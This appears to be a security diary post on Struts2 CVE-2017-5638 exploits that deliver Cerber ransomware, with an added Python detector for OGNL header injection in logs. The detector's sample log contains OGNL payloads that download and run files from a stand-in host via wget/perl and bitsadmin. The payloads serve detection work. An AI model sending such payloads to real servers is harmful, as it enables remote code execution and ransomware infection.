[We have a special webcast about the Struts2 vulnerability scheduled for 11am ET today. Sign up here] For about a month, we have been tracking numerous attempts to exploit the Apache Struts2 vulnerability CVE-2017-5638 (OGNL injection via a crafted Content-Type header handled by the Jakarta Multipart parser). Typically, the exploits targeted Unix systems with simple Perl backdoors and bots. But recently, I saw a number of exploit attempts targeting Windows systems using a variant of the Cerber ransomware.
The command executed by the exploit as shown above:
VirusTotal shows pretty good coverage for this malware by now. The malware reaches out to btc.blockr.io to retrieve a bitcoin wallet address for the ransom payment, so that request is a usable network indicator for this variant. Encrypted files are renamed using random (encrypted) file names.
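To tell the Unix and Windows flavours of these exploit attempts apart in your own logs, the following is an added example (not code from the ISC diary or from any Struts project); it scans request headers for an OGNL expression and tags the payload by the shell it invokes. The JSON-lines request format, the example.invalid URLs and the source addresses are all constructed for this example; real web servers do not log Content-Type by default, so you would first add it to your access log format (for Apache, `%{Content-Type}i` in a LogFormat directive).

```python
import json
import re
from urllib.parse import unquote

# An OGNL expression opener, "%{" or "${"; scanners sometimes percent-encode it.
OGNL_RE = re.compile(r"[%$]\{")
# Headers that the vulnerable Jakarta Multipart parser copied into the error
# message that Struts2 then evaluated as OGNL.
INTERESTING_HEADERS = ("content-type", "content-disposition", "content-length")
# Crude hints for which platform the injected command targets.
WINDOWS_HINTS = re.compile(r"cmd(\.exe)?\s*/c|powershell|certutil|bitsadmin", re.I)
UNIX_HINTS = re.compile(r"/bin/(ba)?sh|\bwget\b|\bcurl\b|\bperl\b", re.I)


def classify_header(name, value):
    """Return a finding dict if this header carries an OGNL payload, else None."""
    if name.lower() not in INTERESTING_HEADERS:
        return None
    decoded = unquote(value)  # undo percent-encoding before matching
    if not OGNL_RE.search(decoded):
        return None
    if WINDOWS_HINTS.search(decoded):
        target = "windows"
    elif UNIX_HINTS.search(decoded):
        target = "unix"
    else:
        target = "unknown"
    return {"header": name, "target": target, "payload": decoded[:80]}


def scan_log(lines):
    """Scan JSON-lines request records (assumed log format) and return findings."""
    findings = []
    for raw in lines:
        rec = json.loads(raw)
        for name, value in rec.get("headers", {}).items():
            hit = classify_header(name, value)
            if hit:
                hit["src"] = rec.get("src")
                hit["path"] = rec.get("path")
                findings.append(hit)
    return findings


# Constructed sample log: one benign upload, a Unix-style Perl dropper, a
# Windows-style dropper, an unrelated JSON request, and a percent-encoded probe.
SAMPLE_LOG = [
    json.dumps({"src": "203.0.113.5", "path": "/upload.action",
                "headers": {"Content-Type": "multipart/form-data; boundary=----abc123"}}),
    json.dumps({"src": "198.51.100.7", "path": "/struts2-showcase/index.action",
                "headers": {"Content-Type": "%{(#_='multipart/form-data').(#cmd='wget "
                            "http://example.invalid/a.pl -O /tmp/a.pl;perl /tmp/a.pl')."
                            "(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd}))}"}}),
    json.dumps({"src": "198.51.100.9", "path": "/index.action",
                "headers": {"Content-Type": "%{(#_='multipart/form-data').(#cmd='cmd.exe /c "
                            "bitsadmin /transfer x http://example.invalid/c.exe %TEMP%\\c.exe')}"}}),
    json.dumps({"src": "192.0.2.20", "path": "/api/items",
                "headers": {"Content-Type": "application/json", "X-Note": "${not scanned}"}}),
    json.dumps({"src": "198.51.100.11", "path": "/index.action",
                "headers": {"Content-Type": "%25%7B(#_='multipart/form-data')%7D"}}),
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['src']} {finding['path']} [{finding['target']}] {finding['payload']}")
```

Only headers that the vulnerable parser echoed are checked, so a `${...}` string in an unrelated header or in the request body is ignored; this keeps false positives low but means the scan is only as good as what your log captured.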
---
Johannes, ISC Handler, Apr 6th 2017
Quote: As usual, pretty harmless! Only Windows administrators who still have not employed whitelisting (for example using Software Restriction Policies, available in ALL editions of Windows XP and later versions) to deny execution in %USERPROFILE% (and all other locations unprivileged users can write to) put their users at trivially avoidable risk.
Anonymous, Apr 6th 2017